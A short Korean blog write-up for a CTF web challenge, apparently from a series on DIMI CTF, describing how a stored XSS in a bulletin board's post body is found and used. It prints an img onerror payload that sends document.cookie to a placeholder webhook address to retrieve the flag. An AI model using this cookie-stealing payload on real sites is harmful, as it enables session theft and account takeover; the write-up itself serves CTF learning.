반응형
DIMI CTF Web simple XSS Writeup
문제는 위와 같다. XSS 문제이니 <script>alert(1);</script> 를 사용해볼 예정이다.
따로 파일이 없어서 문제 사이트로 들어가보니 게시판이 나온다.
<script>alert(1);</script>게시판이 나온다면 글쓰기에서 바로 XSS를 검사해봤고, contents 부분에서 XSS 취약점을 찾았다.
<img src=1 onerror=location.href="웹훅주소?q=" + document.cookie;>따라서 img 태그와 웹훅 사이트를 이용해 쿠키를 보냈다.
웹훅사이트에 패킷이 도착했다. 쿠키를 보면 flag가 있다.
728x90
'웹해킹 > DIMI CTF' 카테고리의 다른 글
| DIMI CTF Web AoJ Writeup (0) | 2022.12.01 |
|---|---|
| DIMI CTF Web simple sqli Writeup (0) | 2022.11.30 |
| DIMI CTF Web exec me Writeup (0) | 2022.11.28 |
| DIMI CTF Web 5 Shard Writeup (0) | 2022.11.27 |
